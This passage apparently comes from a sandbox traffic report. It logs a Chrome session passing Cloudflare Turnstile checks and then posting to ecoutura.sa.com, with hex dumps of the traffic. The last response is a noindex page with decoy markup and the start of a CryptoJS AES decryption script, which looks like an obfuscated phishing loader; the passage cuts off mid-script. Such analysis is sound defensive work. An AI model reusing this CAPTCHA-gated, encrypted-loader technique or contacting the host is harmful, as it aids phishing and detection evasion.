                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/ndzua/0x4AAAAAAAymN2-m7RRX_jxe/auto/fbE/normal/auto/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-11-01 12:46:24 UTC16384OUTData Raw: 76 5f 38 64 62 62 66 63 36 35 66 66 39 65 36 62 33 31 3d 41 6a 55 39 62 63 4f 56 6d 57 6d 4e 6d 4f 25 32 62 4f 65 7a 77 7a 4c 52 64 4f 68 7a 45 39 2d 68 32 46 51 4f 58 7a 4e 71 32 64 51 7a 42 7a 2d 67 42 32 35 56 4f 2d 42 51 7a 69 58 7a 4f 45 4f 52 7a 73 74 32 6d 7a 69 68 7a 64 50 45 7a 54 4a 30 39 7a 72 39 69 51 7a 65 39 74 6e 32 32 2b 66 7a 64 57 7a 63 6e 67 2b 4f 67 57 69 39 37 38 7a 77 49 39 46 5a 7a 53 6e 6e 72 73 73 30 33 55 46 43 7a 76 6e 6e 58 58 51 7a 41 31 56 45 33 7a 73 30 7a 70 7a 7a 45 31 7a 64 6c 2d 70 6e 74 7a 42 43 51 32 39 4f 57 39 44 61 63 6d 78 6e 74 32 4a 44 46 4d 4e 70 64 7a 30 44 6e 35 68 51 6a 7a 46 38 51 7a 4f 4a 76 47 4c 64 4e 50 7a 46 41 78 50 38 79 57 62 58 36 50 39 6d 4f 41 2b 33 4e 45 76 31 78 72 58 78 6b 56 77 4f 4b 6e 31 6d
                                                                                        Data Ascii: v_8dbbfc65ff9e6b31=AjU9bcOVmWmNmO%2bOezwzLRdOhzE9-h2FQOXzNq2dQzBz-gB25VO-BQziXzOEORzst2mzihzdPEzTJ09zr9iQze9tn22+fzdWzcng+OgWi978zwI9FZzSnnrss03UFCzvnnXXQzA1VE3zs0zpzzE1zdl-pntzBCQ29OW9Dacmxnt2JDFMNpdz0Dn5hQjzF8QzOJvGLdNPzFAxP8yWbX6P9mOA+3NEv1xrXxkVwOKn1m
                                                                                        2024-11-01 12:46:24 UTC16384OUTData Raw: 32 64 68 46 55 39 7a 7a 33 58 74 4f 32 63 36 7a 71 74 63 34 63 50 4e 7a 4f 49 46 66 7a 64 6a 46 67 63 33 55 50 6e 52 39 4f 33 48 35 4d 62 65 63 75 7a 31 66 55 39 63 6d 7a 73 30 4c 49 42 47 39 45 39 61 6a 4f 4a 32 33 7a 35 7a 63 63 7a 53 55 4f 30 7a 7a 4f 33 39 63 74 4f 6b 32 47 7a 7a 55 46 75 7a 55 7a 69 55 63 72 69 63 39 64 6d 63 30 7a 77 56 41 6d 46 4e 7a 34 6d 69 7a 4f 69 7a 31 39 42 30 46 5a 7a 35 7a 52 56 46 69 7a 38 7a 69 30 4f 5a 48 2b 7a 63 7a 35 34 7a 35 7a 4f 43 58 35 57 35 74 57 7a 69 4c 65 5a 7a 52 55 6b 78 7a 73 7a 4c 74 46 75 7a 59 7a 70 74 35 49 43 58 32 41 57 63 4f 7a 46 7a 57 55 69 50 4f 4b 7a 59 64 7a 4c 2b 33 7a 52 62 37 38 74 31 39 4f 54 32 6a 7a 50 39 61 55 7a 74 7a 50 6a 64 6d 69 6e 4f 67 39 7a 6c 38 69 57 33 39 46 67 4f 2b 4f 59 76
                                                                                        Data Ascii: 2dhFU9zz3XtO2c6zqtc4cPNzOIFfzdjFgc3UPnR9O3H5Mbecuz1fU9cmzs0LIBG9E9ajOJ23z5zcczSUO0zzO39ctOk2GzzUFuzUziUcric9dmc0zwVAmFNz4mizOiz19B0FZz5zRVFiz8zi0OZH+zcz54z5zOCX5W5tWziLeZzRUkxzszLtFuzYzpt5ICX2AWcOzFzWUiPOKzYdzL+3zRb78t19OT2jzP9aUztzPjdminOg9zl8iW39FgO+OYv
                                                                                        2024-11-01 12:46:24 UTC1581OUTData Raw: 73 56 7a 6d 7a 62 4d 33 36 35 53 66 32 64 61 55 46 34 72 63 34 73 34 6f 63 71 42 79 36 44 34 4b 53 55 32 35 75 7a 74 7a 58 32 4c 64 7a 31 32 2d 34 76 62 79 74 7a 33 30 71 33 52 4a 32 6b 57 4e 36 4f 4a 32 56 7a 42 2d 76 68 32 75 39 52 49 75 52 42 57 6d 52 59 41 56 4b 4d 43 6d 32 63 31 37 52 66 5a 39 4f 2b 41 31 5a 69 38 63 4c 42 39 32 4f 30 7a 79 50 30 36 70 65 4c 33 4c 7a 67 38 49 74 5a 7a 73 4a 61 55 63 65 7a 48 79 36 2b 52 73 71 54 33 63 79 2b 6d 6f 34 32 64 66 35 39 71 75 6d 66 74 46 69 7a 2d 6a 41 74 4f 52 6c 37 6d 4e 52 43 38 46 55 2d 32 70 47 79 50 57 30 41 35 64 34 66 2b 6f 70 34 44 74 58 67 50 35 4e 49 67 7a 4f 4e 36 55 7a 77 77 79 44 72 56 4f 4a 32 73 7a 4f 50 63 39 45 58 57 6c 61 34 61 42 53 51 53 57 4f 73 7a 64 73 4f 6c 68 6a 6c 67 31 58 51 47
                                                                                        Data Ascii: sVzmzbM365Sf2daUF4rc4s4ocqBy6D4KSU25uztzX2Ldz12-4vbytz30q3RJ2kWN6OJ2VzB-vh2u9RIuRBWmRYAVKMCm2c17RfZ9O+A1Zi8cLB92O0zyP06peL3Lzg8ItZzsJaUcezHy6+RsqT3cy+mo42df59qumftFiz-jAtORl7mNRC8FU-2pGyPW0A5d4f+op4DtXgP5NIgzON6UzwwyDrVOJ2szOPc9EXWla4aBSQSWOszdsOlhjlg1XQG
                                                                                        2024-11-01 12:46:24 UTC1361INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:24 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Content-Length: 4476
                                                                                        Connection: close
                                                                                        cf-chl-out: ykye6V0BgL3oxXepE1VWGdQLc+fa954lBuipvYtuevGTEvAbGQHRig89RlObh8vgXOE/O5BFs2XRq97+GORfMKW93JT/qLNCf4vwFSkIndgrJnsWgc8L71s=$tA59plf9oPzC6L8h
                                                                                        cf-chl-out-s: FaVjF6vWll9489HidKpe+2n3hOg+zgYr+HVTsP3lnnDABPV3rVakRpq2h/3mBST8AUvQkMLwuP5SQQj8ZP7drfWDElayigWHR7p/mIi29DreSz/pMrJyXMMxQz2x2dDyR3OctqG+RCaMKHuMLrP01vR/zdidb6jhHV/At9rHwf5yAvSCtahcjz18Ndcnf8caPQ4y9F+k0wmBavorNiEypcxzqbl9or04x9uNNbFh673vB551kduLQ7acfHWLUH6WxLE1ZsgNoXNt8YHEGjH/rxnBCRHHWMB2e3YTZqqyGbjhwpf5dbDM00kKS0Gr0OzNQH6hg3VleSiGcZIPnVlii+nfgWH5zMcz0aiijiwKzYyca3B8Gsj2cUMnxLlql7Osks/fmvfMi3EKXi1KU1K84aHSkIRieI9HXA5oUh1znCNZz0HGsc6wle1k5fcUD0MJmW2UCmojeW3vNUr4aCp+G+Rh0Z8fnPWttzR8eHlrMJHrKCcoZbrMe3cvJKAc8FwjKyBszHIdZ4oU8UgUcUolK5H0YxjR1UGwCsBKBzCT3erYQ4pRmSujClDWy+8ZyDhr3u8l4evffkx8AIVJFUHjqzfg9aV3kb7i9Uu99pUP4vXOxQPukPp7D9VgN7zG3Fi/tcnUVhHid62HTzSiEDI+VGjved0FtZdfWOmEDv++pWssnOK+85QX2+LAU5vc0Aq12JDI79uTmmQxgERDsaSz6pegqT9oDEtxnaZm7KXabN6Yrp7Qxu4UcsGMSA4aIusrbLlDD7Stx6A232a2V667czwQnpS14w8DDORB8x12/AQ567dn1guEXOYLNCzJxWc+gfq+tatiG1jDCXhr48VYXSVoZ8jpTOv5CPV+XGTT5IS7arirPwLEwYpkNlJ7rBrLi/Nz5RnV8CjmiLWm1SFpwqTCo8sFybmhJMZzIpKDvjOTlmIYtAjdXjkDufpMta6o2fzTY2Y4hhqH9v+1TtaJxhu5vJ8Ecpk=$imA5AliOOVsuLFXO
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8dbbfccb3e346b9a-DFW
                                                                                        2024-11-01 12:46:24 UTC32INData Raw: 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                        Data Ascii: alt-svc: h3=":443"; ma=86400
                                                                                        2024-11-01 12:46:24 UTC1345INData Raw: 68 6f 53 4e 6d 57 32 61 61 58 6c 5a 6a 46 69 44 59 32 39 37 6f 57 42 36 6f 59 71 4e 6f 4b 47 66 6d 59 36 49 6f 4c 4b 32 74 62 65 79 69 36 71 32 73 61 57 5a 63 61 76 41 72 72 32 43 66 4a 36 31 6c 36 57 69 75 5a 6e 4d 6f 35 75 64 6d 35 48 4d 6b 49 75 2b 71 37 53 68 32 35 53 4f 6b 39 2b 63 71 71 48 4c 6f 62 33 6d 6f 4c 75 78 78 65 53 69 77 72 6a 6b 70 37 6d 76 38 63 66 69 38 4d 43 75 2b 50 54 4a 77 2f 6a 7a 36 72 33 62 30 63 44 62 41 51 41 44 41 51 51 44 33 4d 67 49 34 51 6a 69 41 4d 38 4b 35 77 62 55 79 4d 37 50 37 52 66 31 47 52 6e 70 39 78 34 62 49 2b 41 55 35 50 50 37 46 79 4d 58 43 79 6f 58 49 2b 48 36 4d 77 59 73 49 69 49 4a 4e 53 38 5a 42 44 63 61 45 7a 67 52 50 30 45 6a 49 44 6f 79 48 6b 51 39 47 44 51 49 4e 6b 41 4a 50 79 38 62 44 69 63 56 52 46 41
                                                                                        Data Ascii: hoSNmW2aaXlZjFiDY297oWB6oYqNoKGfmY6IoLK2tbeyi6q2saWZcavArr2CfJ61l6WiuZnMo5udm5HMkIu+q7Sh25SOk9+cqqHLob3moLuxxeSiwrjkp7mv8cfi8MCu+PTJw/jz6r3b0cDbAQADAQQD3MgI4QjiAM8K5wbUyM7P7Rf1GRnp9x4bI+AU5PP7FyMXCyoXI+H6MwYsIiIJNS8ZBDcaEzgRP0EjIDoyHkQ9GDQINkAJPy8bDicVRFA
                                                                                        2024-11-01 12:46:24 UTC1369INData Raw: 59 78 64 52 31 74 61 59 57 31 4d 53 32 46 52 56 6d 46 59 57 32 5a 62 6a 31 78 5a 6d 6e 52 64 56 71 4b 59 64 48 4f 42 6c 34 47 6d 71 34 46 6d 71 35 71 6a 63 32 79 7a 73 49 53 7a 73 71 5a 7a 65 4a 4b 65 6a 4c 75 38 6f 62 69 43 64 34 43 33 65 70 79 33 67 70 57 56 71 71 65 61 7a 37 75 54 6a 4e 48 47 6c 4b 48 58 31 35 53 55 32 62 47 36 71 70 2b 38 6e 4e 36 62 77 63 50 6a 35 38 61 39 74 73 50 6f 75 2b 76 71 33 39 75 77 38 63 37 45 38 36 76 7a 39 37 53 76 74 4e 37 4a 77 66 7a 59 75 75 37 68 36 4e 54 66 34 75 44 49 43 77 51 48 77 67 30 51 45 52 41 55 41 65 62 4b 38 75 6e 33 36 41 6f 49 48 68 77 65 47 39 76 67 2f 41 66 31 33 68 62 6b 43 75 6f 72 36 41 7a 34 4b 79 30 42 39 43 55 46 38 7a 58 72 50 42 6a 35 4b 6b 42 41 2b 55 44 34 4d 76 59 64 2f 52 4c 36 53 41 46 46
                                                                                        Data Ascii: YxdR1taYW1MS2FRVmFYW2Zbj1xZmnRdVqKYdHOBl4Gmq4Fmq5qjc2yzsISzsqZzeJKejLu8obiCd4C3epy3gpWVqqeaz7uTjNHGlKHX15SU2bG6qp+8nN6bwcPj58a9tsPou+vq39uw8c7E86vz97SvtN7JwfzYuu7h6NTf4uDICwQHwg0QERAUAebK8un36AoIHhweG9vg/Af13hbkCuor6Az4Ky0B9CUF8zXrPBj5KkBA+UD4MvYd/RL6SAFF
                                                                                        2024-11-01 12:46:24 UTC1369INData Raw: 31 54 6b 32 6c 66 55 31 57 53 6c 5a 46 31 64 31 70 6f 66 46 2b 6b 57 33 31 68 63 32 53 41 6c 6d 6d 6f 6c 71 68 39 61 70 31 73 62 6e 53 69 72 6e 4b 43 6b 61 4e 33 63 71 71 75 66 4c 71 76 64 49 43 4e 73 4b 2b 42 6b 63 54 44 71 4a 69 6a 7a 4b 69 61 76 71 32 7a 7a 38 47 32 70 5a 58 45 6b 61 75 6d 70 62 6d 59 6b 72 61 79 75 4b 32 39 76 72 71 79 35 62 57 70 6f 74 62 42 31 2b 7a 4a 32 36 2f 75 38 4d 6d 78 73 4d 48 76 39 4d 6a 6d 38 2b 2b 39 31 4f 48 36 75 76 48 57 30 64 50 68 78 65 45 49 79 2b 48 4c 79 41 37 79 34 4d 6f 43 30 42 63 55 47 4e 6e 72 31 2b 55 56 39 74 34 4f 45 50 6e 57 31 39 2f 68 34 67 49 72 34 75 77 42 4c 43 63 72 4c 53 51 63 37 52 38 30 39 66 51 6a 4a 42 67 48 4b 69 77 66 2f 53 30 38 42 45 45 78 4e 44 59 43 43 44 73 45 43 30 6f 5a 43 78 42 4f 42
                                                                                        Data Ascii: 1Tk2lfU1WSlZF1d1pofF+kW31hc2SAlmmolqh9ap1sbnSirnKCkaN3cqqufLqvdICNsK+BkcTDqJijzKiavq2zz8G2pZXEkaumpbmYkrayuK29vrqy5bWpotbB1+zJ26/u8MmxsMHv9Mjm8++91OH6uvHW0dPhxeEIy+HLyA7y4MoC0BcUGNnr1+UV9t4OEPnW19/h4gIr4uwBLCcrLSQc7R809fQjJBgHKiwf/S08BEExNDYCCDsEC0oZCxBOB
                                                                                        2024-11-01 12:46:24 UTC393INData Raw: 77 56 31 53 4a 6a 33 6d 61 6a 31 79 42 6e 71 47 57 58 71 6d 58 6c 48 74 6a 68 59 5a 35 65 4b 71 49 74 48 36 4e 6c 6f 53 42 64 36 53 46 68 58 75 55 65 37 75 4a 72 6e 32 4d 76 72 62 49 77 38 4b 61 6d 4d 62 4c 77 4a 75 59 76 37 4b 68 6e 63 4f 2b 6a 71 4c 43 77 74 76 59 6d 39 71 58 32 39 72 51 72 39 36 6a 75 72 58 6a 77 64 36 69 36 4e 62 6b 76 65 7a 71 79 4b 33 76 79 4f 36 31 38 2f 4c 32 75 50 66 6d 32 73 7a 37 31 50 72 43 33 72 2f 79 7a 2f 50 6d 35 51 49 48 36 75 66 34 37 38 73 4b 38 67 30 57 46 77 72 54 35 39 6e 32 36 76 59 52 2f 4f 37 76 41 42 54 78 2f 67 51 6b 39 42 34 48 44 52 58 37 45 43 34 4a 36 79 73 49 4a 2b 63 72 45 66 67 35 39 7a 62 35 47 7a 4a 42 4b 7a 63 38 49 51 52 46 4e 53 59 6b 43 42 59 2b 53 52 67 6f 49 6b 78 43 4b 44 35 4a 4a 30 63 6a 47 51
                                                                                        Data Ascii: wV1SJj3maj1yBnqGWXqmXlHtjhYZ5eKqItH6NloSBd6SFhXuUe7uJrn2MvrbIw8KamMbLwJuYv7KhncO+jqLCwtvYm9qX29rQr96jurXjwd6i6NbkvezqyK3vyO618/L2uPfm2sz71PrC3r/yz/Pm5QIH6uf478sK8g0WFwrT59n26vYR/O7vABTx/gQk9B4HDRX7EC4J6ysIJ+crEfg59zb5GzJBKzc8IQRFNSYkCBY+SRgoIkxCKD5JJ0cjGQ


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        24192.168.2.449775104.18.95.414435772C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:25 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1024805803:1730463054:b1rgIEdpWeHxmQJHck6RV8EmMMFOLeJcpMeBvebYgsc/8dbbfc65ff9e6b31/YskjOMlt.092AVHG.UE3lCUdd4zGhRJt1uSalhQrUMU-1730465168-1.1.1.1-yGD2l9ovY9dDpnf_eBS_OXrkjwGpYqg3WZZgwfmyKhkt414YGGj1tgkl1n9lqZ89 HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-11-01 12:46:25 UTC379INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 01 Nov 2024 12:46:25 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 7
                                                                                        Connection: close
                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                        cf-chl-out: 2UZbZJUiB7aJCh4tfJY7Hnn2bK7cLBfpfx8=$sZXIeceZ4gLp1BQp
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8dbbfcd15ee5eb1b-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-11-01 12:46:25 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                        Data Ascii: invalid


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        25192.168.2.449777188.114.97.34435772C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:26 UTC886OUTPOST /9o93/ HTTP/1.1
                                                                                        Host: ecoutura.sa.com
                                                                                        Connection: keep-alive
                                                                                        Content-Length: 859
                                                                                        Cache-Control: max-age=0
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Upgrade-Insecure-Requests: 1
                                                                                        Origin: https://ecoutura.sa.com
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: navigate
                                                                                        Sec-Fetch-User: ?1
                                                                                        Sec-Fetch-Dest: document
                                                                                        Referer: https://ecoutura.sa.com/9o93/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Cookie: PHPSESSID=b9tlets4pfikfq68tperuik8h3
                                                                                        2024-11-01 12:46:26 UTC859OUTData Raw: 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 3d 30 2e 6d 63 43 74 38 36 38 65 5a 4a 77 72 79 37 66 65 76 7a 77 39 31 6c 39 62 55 74 65 59 52 6f 4b 6e 66 73 57 32 45 65 46 5a 67 67 63 75 77 51 6a 62 63 68 69 5f 78 7a 31 59 36 65 76 31 51 74 53 66 48 6e 36 41 47 32 46 7a 41 61 6a 6d 6d 34 31 76 55 45 62 7a 4a 4e 34 6c 67 5f 69 6c 4a 44 2d 78 4a 34 5a 6b 33 73 38 46 31 57 59 56 38 78 42 35 53 66 44 54 46 59 7a 36 54 5f 58 37 32 4d 5f 37 71 4c 35 46 72 59 55 42 34 57 6b 38 76 53 65 45 64 41 4e 6d 7a 6f 39 42 4c 54 63 4a 2d 4c 6a 62 32 4d 49 6c 42 63 62 63 7a 64 5a 51 39 31 48 46 78 64 61 37 78 65 41 35 39 43 36 4c 52 32 58 4a 57 30 7a 51 56 78 4b 46 4b 6e 64 45 41 72 5a 4c 79 47 54 54 52 45 73 6d 4f 51 34 75 56 51 35 6c 4c 55 45 41 62 73 6f
                                                                                        Data Ascii: cf-turnstile-response=0.mcCt868eZJwry7fevzw91l9bUteYRoKnfsW2EeFZggcuwQjbchi_xz1Y6ev1QtSfHn6AG2FzAajmm41vUEbzJN4lg_ilJD-xJ4Zk3s8F1WYV8xB5SfDTFYz6T_X72M_7qL5FrYUB4Wk8vSeEdANmzo9BLTcJ-Ljb2MIlBcbczdZQ91HFxda7xeA59C6LR2XJW0zQVxKFKndEArZLyGTTREsmOQ4uVQ5lLUEAbso
                                                                                        2024-11-01 12:46:26 UTC957INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:26 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        x-powered-by: PHP/7.3.33
                                                                                        access-control-allow-origin: *
                                                                                        expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        cache-control: no-store, no-cache, must-revalidate
                                                                                        pragma: no-cache
                                                                                        vary: Accept-Encoding
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BenjFO0wYOjKSNf3dcu61utkHZE5pja8Cl9jDxecoNb%2FWeyzGcyD6qILz4FR0U8Mbmi3X3uUTgyN2wcpN1B%2F5NI%2FEjNfzc9Z%2Bvd%2FuvNprL1C6X4hwc4oz7HnQKTr9J3mGpk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8dbbfcd56fc46ba7-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1168&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=2345&delivery_rate=2468883&cwnd=68&unsent_bytes=0&cid=f28168117cea8f75&ts=769&x=0"
                                                                                        2024-11-01 12:46:26 UTC412INData Raw: 31 38 31 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 0a 0a 20 3c 6d 65 74 61 20 20 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 09 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 0a 0a 09 20 09 3c 6d 65 74 61 09 09 09 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 09 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 0a 20 3c 73 63 72 69 70 74 09 09 09 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 3e 20 20 3c 2f 73 63 72
                                                                                        Data Ascii: 1816<html><head> <meta name="viewport" content="width=device-width,initial-scale=1.0"> <metaname="robots"content="noindex, nofollow"> <scriptsrc="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js"> </scr
                                                                                        2024-11-01 12:46:26 UTC1369INData Raw: 30 25 2c 09 09 31 32 2e 35 25 2c 09 20 33 32 2e 35 25 2c 20 09 09 37 36 2e 31 25 09 20 7b 74 72 61 6e 73 66 6f 72 6d 3a 09 09 74 72 61 6e 73 6c 61 74 65 59 28 30 29 3b 7d 32 32 2e 35 25 2c 20 38 36 25 20 09 20 7b 74 72 61 6e 73 66 6f 72 6d 3a 09 20 74 72 61 6e 73 6c 61 74 65 59 28 37 70 78 29 3b 7d 7d 23 67 61 64 67 65 74 09 09 20 7b 68 65 69 67 68 74 3a 09 09 31 37 39 70 78 3b 77 69 64 74 68 3a 09 09 20 31 33 30 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 09 2d 35 39 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 20 32 35 70 78 3b 7d 40 6b 65 79 66 72 61 6d 65 73 20 09 73 68 61 64 6f 77 2d 66 61 64 65 20 20 7b 30 25 2c 09 09 31 30 30 25 2c 20 32 31 2e 32 25 2c 09 20 38 30 25 09 20 7b 6f 70 61 63 69 74 79
                                                                                        Data Ascii: 0%,12.5%, 32.5%, 76.1% {transform:translateY(0);}22.5%, 86% {transform: translateY(7px);}}#gadget {height:179px;width: 130px;overflow: hidden;margin-top:-59px;margin-left: 25px;}@keyframes shadow-fade {0%,100%, 21.2%, 80% {opacity
                                                                                        2024-11-01 12:46:26 UTC1369INData Raw: 7d 36 38 2e 35 25 09 09 7b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 36 36 2c 09 09 2d 30 2e 31 36 2c 09 20 31 2c 09 09 09 2d 30 2e 32 39 29 3b 7d 7d 23 76 61 67 61 62 6f 6e 64 61 67 65 09 20 09 3e 20 2e 62 61 63 69 6c 6c 61 72 79 20 20 20 7b 77 69 64 74 68 3a 09 09 20 31 31 38 70 78 3b 68 65 69 67 68 74 3a 09 32 31 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 20 2d 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 09 23 30 30 36 38 38 62 3b 7d 23 76 61 67 61 62 6f 6e 64 61 67 65 20 3e 09 2e 64 61 69 6e 74 69 6e 65 73 73 09 7b 64 69 73 70 6c 61 79 3a 09 20 66 6c 65 78 3b 77 69 64 74 68 3a 20 20 09 31 31 38 70 78 3b 68 65 69 67 68 74 3a 09 20 09 33 37 70 78 3b 7d 2e 71
                                                                                        Data Ascii: }68.5%{animation-timing-function: cubic-bezier(0.66,-0.16, 1,-0.29);}}#vagabondage > .bacillary {width: 118px;height:21px;margin-bottom: -1px;background:#00688b;}#vagabondage >.daintiness{display: flex;width: 118px;height: 37px;}.q
                                                                                        2024-11-01 12:46:26 UTC1369INData Raw: 74 3a 09 09 39 36 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 09 20 23 37 34 63 33 65 35 3b 6d 61 72 67 69 6e 3a 09 20 09 2d 34 38 70 78 20 09 09 61 75 74 6f 20 09 30 20 09 61 75 74 6f 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 09 37 70 78 3b 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 59 28 30 2e 36 29 09 20 20 72 6f 74 61 74 65 28 34 35 64 65 67 29 3b 7d 23 65 61 67 6c 65 09 20 2e 79 61 6e 67 09 20 09 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 09 23 30 30 35 66 37 66 3b 7d 23 64 61 69 72 79 6d 61 69 64 09 20 09 2e 79 61 6e 67 09 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 37 34 63 33 65 35 3b 7d 0d 0a 0a 0a 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 09 3c 2f 68 65 61 64 3e 0d 0a 0a 0a 20 09 3c 62 6f 64 79 3e 0d 0a 3c 21 2d 2d 20 20 3c 70 3e 54 68 65 09 20 20 72 6f
                                                                                        Data Ascii: t:96px;background: #74c3e5;margin: -48px auto 0 auto;border-radius:7px;transform: scaleY(0.6) rotate(45deg);}#eagle .yang {background:#005f7f;}#dairymaid .yang{background: #74c3e5;} </style> </head> <body>... <p>The ro
                                                                                        2024-11-01 12:46:26 UTC1369INData Raw: 76 3e 20 3c 2f 64 69 76 3e 0d 0a 0a 0a 09 3c 2f 62 6f 64 79 3e 0d 0a 3c 68 31 09 20 09 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 3e 41 64 76 65 6e 74 75 72 65 20 6c 69 65 73 20 77 68 65 72 65 09 74 68 65 20 09 72 6f 61 64 20 09 6d 65 65 74 73 09 74 68 65 09 20 09 68 6f 72 69 7a 6f 6e e2 80 99 73 09 09 09 65 64 67 65 2e 3c 2f 68 31 3e 0d 0a 0a 0a 3c 73 63 72 69 70 74 3e 0d 0a 0a 20 20 61 73 79 6e 63 20 09 09 66 75 6e 63 74 69 6f 6e 20 20 61 62 61 6e 64 6f 6e 6d 65 6e 74 28 6b 65 65 6c 68 61 75 6c 29 20 7b 0d 0a 20 76 61 72 09 7b 61 2c 62 2c 63 2c 64 7d 20 3d 09 4a 53 4f 4e 2e 70 61 72 73 65 28 6b 65 65 6c 68 61 75 6c 29 3b 0d 0a 20 09 72 65 74 75 72 6e 20 43 72 79 70 74 6f 4a 53 2e 41 45 53 2e 64 65 63 72 79 70 74 28 61 2c 20 09 43 72
                                                                                        Data Ascii: v> </div></body><h1 style="display:none;">Adventure lies wherethe road meetsthe horizonsedge.</h1><script> async function abandonment(keelhaul) { var{a,b,c,d} =JSON.parse(keelhaul); return CryptoJS.AES.decrypt(a, Cr
